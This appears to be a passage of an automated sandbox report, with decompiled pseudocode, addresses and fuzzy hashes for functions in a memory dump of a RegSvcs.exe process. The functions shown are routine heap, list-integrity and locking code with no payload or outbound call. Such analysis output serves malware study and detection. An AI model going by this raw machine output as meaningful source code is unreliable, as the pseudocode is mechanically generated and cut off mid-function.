0x00ab26bb
0x00000000
0x00ab26bb
0x00a6aea3
0x00a6aea3
0x00a6aea3
0x00a6aeaa
0x00ab26c0
0x00ab26c9
0x00ab26c9
0x00a6aeb3
0x00ab26d4
0x00ab26e1
0x00000000
0x00000000
0x00ab26e7
0x00ab26ee
0x00ab26f0
0x00ab26f9
0x00ab26f9
0x00ab2702
0x00ab2708
0x00ab2708
0x00ab270b
0x00ab270f
0x00ab2711
0x00ab2711
0x00ab2725
0x00ab2725
0x00000000
0x00a6aeb9
0x00a6aeb9
0x00a6aebf
0x00a6aebf
0x00a6aeb3

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction ID: 63baf22d2feda216d6de6c2d411192c80d578d47d53a837f49eb92c936c958de
Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
Instruction Fuzzy Hash: D121F372615680DFE7269B28CA54B6577F8EF54384F1904A2ED048B7A3E739DC40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00AC7794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00AC7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0xb37b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E00A8F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E00A67D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E00A89AE0();
					_t24 = L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x00ac7799
0x00ac779a
0x00ac779b
0x00ac77a3
0x00ac77ab
0x00ac77ae
0x00ac77b1
0x00ac77b1
0x00ac77bf
0x00ac77c4
0x00ac77c8
0x00ac77ce
0x00ac77d4
0x00ac77e0
0x00ac77e0
0x00ac77d6
0x00ac77d6
0x00ac77de
0x00000000
0x00000000
0x00ac77de
0x00ac77e5
0x00ac77f0
0x00ac77f3
0x00ac77f6
0x00ac77fd
0x00ac7800
0x00ac780c
0x00ac7818
0x00ac782b
0x00ac781a
0x00ac7823
0x00ac7823
0x00ac7830
0x00ac7831
0x00ac7838
0x00ac783d
0x00ac783e
0x00ac784f
0x00ac784f
0x00ac785a

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 475014821252d01882918571d4e2cc991df375d50d8e613124178cb52b064fbb
Instruction ID: 0ba26b8f31174d87adc5d950c91895c96693f1d743063a0c124d0db7ed235a93
Opcode Fuzzy Hash: 475014821252d01882918571d4e2cc991df375d50d8e613124178cb52b064fbb
Instruction Fuzzy Hash: 73219D72904604AFC725DF69D994E6BB7B8EF48740F11056DF60AC7650EA34E900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A7FD9B Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00A7FD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E00A576E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}

0x00a7fd9b
0x00a7fda0
0x00a7fda1
0x00a7fdab
0x00a7fdad
0x00a7fdb0
0x00a7fdb8
0x00a7fe0f
0x00a7fde6
0x00a7fde9
0x00a7fdec
0x00abc0c0
0x00a7fdfe
0x00a7fe06
0x00a7fe06
0x00abc0c8
0x00a7fe2d
0x00a7fe2d
0x00000000
0x00a7fe2d
0x00abc0d1
0x00abc0e0
0x00abc0e5
0x00abc0e5
0x00abc0e8
0x00000000
0x00abc0e8
0x00a7fdf4
0x00000000
0x00000000
0x00a7fdf6
0x00a7fdfa
0x00a7fe1a
0x00a7fe1f
0x00a7fe1f
0x00a7fdfc
0x00000000
0x00a7fdfc
0x00a7fdcc
0x00a7fdd0
0x00a7fe26
0x00000000
0x00a7fe26
0x00a7fdd8
0x00a7fddb
0x00a7fddd
0x00a7fde0
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction ID: 4426d2d3b42efb3e8ccd1a8442edf4fe2f3448926e4393fefae991e6fe142548
Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
Instruction Fuzzy Hash: 52216872A04A40DFC731CF49CA40E66B7F5EB98B10F24C57EE94987A22D730AE00DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A49240 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E00A49240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0xb1f708);
				E00A9D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E00A895D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E00A895D0();
				_t33 =  *0xb384c4; // 0x0
				L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0xb384c4; // 0x0
				L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0xb384c4; // 0x0
				E00A62280(L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0xb386b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E00A895D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E00A895D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E00A49325();
					_t50 =  *0xb384c4; // 0x0
					return E00A9D0D1(L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}

0x00a49240
0x00a49242
0x00a49247
0x00a4924c
0x00a4924e
0x00a49255
0x00a49257
0x00a4925a
0x00a4925f
0x00a4925f
0x00a49266
0x00a49271
0x00a49276
0x00a49279
0x00a4927e
0x00a49295
0x00a4929a
0x00a492b1
0x00a492b6
0x00a492d7
0x00a492dc
0x00a492e0
0x00a492e6
0x00a492e8
0x00a492ee
0x00a49332
0x00a49333
0x00a49337
0x00a49338
0x00a4933a
0x00a4933a
0x00a4933d
0x00a49342
0x00a49342
0x00a49345
0x00a49349
0x00a4934e
0x00a49352
0x00a49357
0x00a492f4
0x00a492f4
0x00a492f6
0x00a492f9
0x00a49300
0x00a49306
0x00a49324
0x00a49324

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fa0e7b7d517e41a9d339525085724559c35a5319182e1004644cf0fd1da98729
Instruction ID: 41d57bf9405ff93409f6dee1e7fde5ecdf810d24d4bdfd5a160312ef8d24d49c
Opcode Fuzzy Hash: fa0e7b7d517e41a9d339525085724559c35a5319182e1004644cf0fd1da98729
Instruction Fuzzy Hash: 96212531151A01EFC722EF68CA41F5AB7F9BF08704F144568B04A9BAB2CB38EA51CB44

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B390 Relevance: .1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00A7B390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E00A62280(_t12, 0xb38608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E00A800C2(0xb38608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}

0x00a7b395
0x00a7b3a2
0x00a7b3a5
0x00a7b3aa
0x00a7b3b2
0x00a7b3ba
0x00a7b3bd
0x00a7b3c0
0x00a7b3c4
0x00a7b3c9
0x00aba3e9
0x00aba3ed
0x00aba3f0
0x00aba3ff
0x00aba403
0x00aba409
0x00000000
0x00000000
0x00aba40b
0x00aba40b
0x00aba40f
0x00aba415
0x00aba423
0x00aba423
0x00aba415
0x00a7b3d1
0x00a7b3e8
0x00a7b3e8
0x00a7b3d9

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb3c8aafb1f302d1b07526b25c881e21016c4fcfbaed5cfc575f289ca1e6a19c
Instruction ID: 02918706409e0bbfcf55174012d58d0b422df1e7630bd92cdc64e22728152319
Opcode Fuzzy Hash: fb3c8aafb1f302d1b07526b25c881e21016c4fcfbaed5cfc575f289ca1e6a19c
Instruction Fuzzy Hash: BD116F773151105BCB189B148D42B6B72AAEBD5730F358139ED1ACB780CE359C01C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00AD4257 Relevance: .1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00AD4257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0xb208d0);
				E00A9D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E00AD41E8(__ebx, __edi, __ecx, _t39);
				E00A5EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0xb387e4;
					_t18 =  *0xb387e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0xb35cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0xb387e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0xb387e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L00A47055(_t31 + 0xfffffff8);
								_t24 =  *0xb387e0; // 0x0
								_t18 = _t24 - 1;
								 *0xb387e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0xb35cd0;
				if( *0xb35cd0 <= 0) {
					L00A47055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0xb387e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0xb387e8 = _t30;
						 *0xb387e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E00A9D0D1(L00AD4320());
			}

0x00ad4257
0x00ad4257
0x00ad4257
0x00ad4259
0x00ad425e
0x00ad4263
0x00ad4265
0x00ad4273
0x00ad4278
0x00ad427c
0x00ad427f
0x00ad4281
0x00ad4287
0x00ad42d7
0x00ad42d7
0x00ad42da
0x00ad428d
0x00ad428d
0x00ad428f
0x00ad4292
0x00ad4297
0x00ad429c
0x00ad42a0
0x00ad42a6
0x00ad42a8
0x00ad42ae
0x00ad42b3
0x00000000
0x00ad42ba
0x00ad42ba
0x00ad42bf
0x00ad42c5
0x00ad42ca
0x00ad42cf
0x00ad42d0
0x00000000
0x00ad42d0
0x00ad42b3
0x00000000
0x00ad42a6
0x00ad429c
0x00ad42dc
0x00ad42dc
0x00ad42e3
0x00ad4309
0x00ad42e5
0x00ad42e5
0x00ad42e8
0x00ad42ee
0x00ad42f0
0x00000000
0x00ad42f2
0x00ad42f2
0x00ad42f4
0x00ad42f7
0x00ad42f9
0x00ad4300
0x00ad4300
0x00ad42f0
0x00ad430e
0x00ad431f

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ebd3ba99033cfa3ef1fa330e107601a8d2997de83a60ab637618bd623d91992
Instruction ID: 747bf29b1e504b226a99e3999a2d1b6f5a459ea100d08180a25394a6ac550a91
Opcode Fuzzy Hash: 7ebd3ba99033cfa3ef1fa330e107601a8d2997de83a60ab637618bd623d91992
Instruction Fuzzy Hash: E7213B70501B01CFCB15DF68D5406587BF2FB89714B7082AAE11A8B3A1DF31E982CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A72397 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E00A72397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0xb3848c != 0) {
					L00A6FAD0(0xb38610);
					if( *0xb3848c == 0) {
						E00A6FA00(0xb38610, _t19, _t27, 0xb38610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E00A72581(0xb38610, 0xa250a0, _t26, _t27, _t28);
						E00A6FA00(0xb38610, 0xa250a0, _t27, 0xb38610);
					}
				} else {
					L1:
					_t11 =  *0xb38614; // 0x0
					if(_t11 == 0) {
						_t11 = E00A84886(0xa21088, 1, 0xb38614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E00A72581(0xb38610, (_t11 << 4) + 0xa25070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}

0x00a723b0
0x00a723b6
0x00a72409
0x00a72415
0x00ab5ae9
0x00000000
0x00a7241b
0x00a7241b
0x00a7241d
0x00a72427
0x00a7242e
0x00a72430
0x00a72430
0x00a723b8
0x00a723b8
0x00a723b8
0x00a723bf
0x00a723fc
0x00a723fc
0x00a723c1
0x00a723c3
0x00a723d0
0x00a723d8
0x00a723d8
0x00a723dc
0x00a723de
0x00a723e1
0x00a723e1
0x00a723ec

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0deef66cd50431b2c153b060dcaba69ba72a04b13b4ea1f597dd4dc7decc09a2
Instruction ID: b60cf97ef43a433fdcaa4037b81da6e790f75241be7cfca3d2379401d8d71d3b
Opcode Fuzzy Hash: 0deef66cd50431b2c153b060dcaba69ba72a04b13b4ea1f597dd4dc7decc09a2
Instruction Fuzzy Hash: C5114E327047106BD3309B39BD41F19B2DCEB60750F24C036F60A9B291CD74EC418755

Uniqueness

Uniqueness Score: -1.00%

Function 00AC46A7 Relevance: .1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00AC46A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L00A64620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E00A8F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E00A7D268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L00A677F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}

0x00ac46b7
0x00ac46ba
0x00ac46c5
0x00ac46c8
0x00ac46d0
0x00ac46d4
0x00ac46e6
0x00ac46e9
0x00ac46f4
0x00ac46ff
0x00ac4705
0x00ac4706
0x00ac470c
0x00ac4713
0x00ac471b
0x00ac4723
0x00ac4725
0x00ac46d6
0x00ac46d9
0x00ac46db
0x00ac46db
0x00ac4732

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction ID: 5bbb5bcb6bb9aad6fa3094b4332502c7c9e1dd326a336fc3f40910fdbe4804bb
Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
Instruction Fuzzy Hash: 0E11C272504208BBC7159F5CD9819BEBBB9EF9A304F10806EF9448B351DA318D55D7A4

Uniqueness

Uniqueness Score: -1.00%

Function 00A4C962 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E00A4C962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0xb3d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E00A5EEF0(0xb370a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E00ACF625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E00A5EB70(_t29, 0xb370a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E00A8B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E00ACF1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0xb370c0; // 0x0
					while(_t38 != 0xb370c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0xb3b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}

0x00a4c96a
0x00a4c974
0x00a4c988
0x00a4c98a
0x00ab7c9d
0x00ab7c9f
0x00ab7ca4
0x00ab7cae
0x00ab7cf0
0x00ab7cf5
0x00ab7cfa
0x00a4c992
0x00a4c996
0x00a4c997
0x00a4c998
0x00a4c9a3
0x00a4c9a3
0x00ab7cb0
0x00ab7cb7
0x00ab7cbb
0x00000000
0x00000000
0x00ab7cbd
0x00ab7ce8
0x00ab7cc5
0x00ab7cc8
0x00ab7cca
0x00ab7cd0
0x00ab7cd6
0x00ab7cde
0x00ab7ce4
0x00ab7ce4
0x00ab7cd0
0x00000000
0x00ab7ce8
0x00a4c990
0x00000000

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0cd0a69230c9df91df6b46a906e03650cc021dfa271969459679ef01073bbd6
Instruction ID: cb94a93c7a225d57ab2b2902fa8d9177369f2f2c69bbf7e997f500bbcb450d4e
Opcode Fuzzy Hash: e0cd0a69230c9df91df6b46a906e03650cc021dfa271969459679ef01073bbd6
Instruction Fuzzy Hash: F31102313086069BC764AF28CD86AAE7BE9BBC5310F20013DF84197662DF60EC14C7D1

Uniqueness

Uniqueness Score: -1.00%

Function 00A837F5 Relevance: .1, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E00A837F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E00A62280(_t6, 0xb38550);
				}
				_t29 = E00A8387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E00A5FFB0(0xb38550, _t27, 0xb38550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L00A677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}

0x00a837fa
0x00a837fc
0x00a83805
0x00a83808
0x00a83808
0x00a83814
0x00a83818
0x00a83846
0x00a83848
0x00a8384b
0x00a8384b
0x00a83852
0x00000000
0x00a83854
0x00a83856
0x00000000
0x00000000
0x00a83863
0x00000000
0x00a83863
0x00a8381a
0x00a8381a
0x00a8381f
0x00a8386e
0x00a8386e
0x00a83871
0x00a83873
0x00a83873
0x00a83868
0x00000000
0x00a83868
0x00a83821
0x00a83826
0x00000000
0x00000000
0x00a83828
0x00a8382a
0x00a83841
0x00000000
0x00a83841

Memory Dump Source

Source File: 00000005.00000002.384204170.0000000000A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A20000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_a20000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19fdfe2efeb798c169c78000df2f7c2faa66b92c8750d1d35854c06ea3f04bd9
Instruction ID: ce5d763239ff2109d48d629fe7b6dd99119e031816827ddbedddd35cdd117596
Opcode Fuzzy Hash: 19fdfe2efeb798c169c78000df2f7c2faa66b92c8750d1d35854c06ea3f04bd9
Instruction Fuzzy Hash: 7901D6B39066109BCB37AB1ADA40E2ABBB6DF95F50B154069F8458B211EB34CE01C780

Uniqueness

Uniqueness Score: -1.00%

Function 00A7002D Relevance: .1, Instructions: 55
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00A7002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E00A67D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E00A67D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
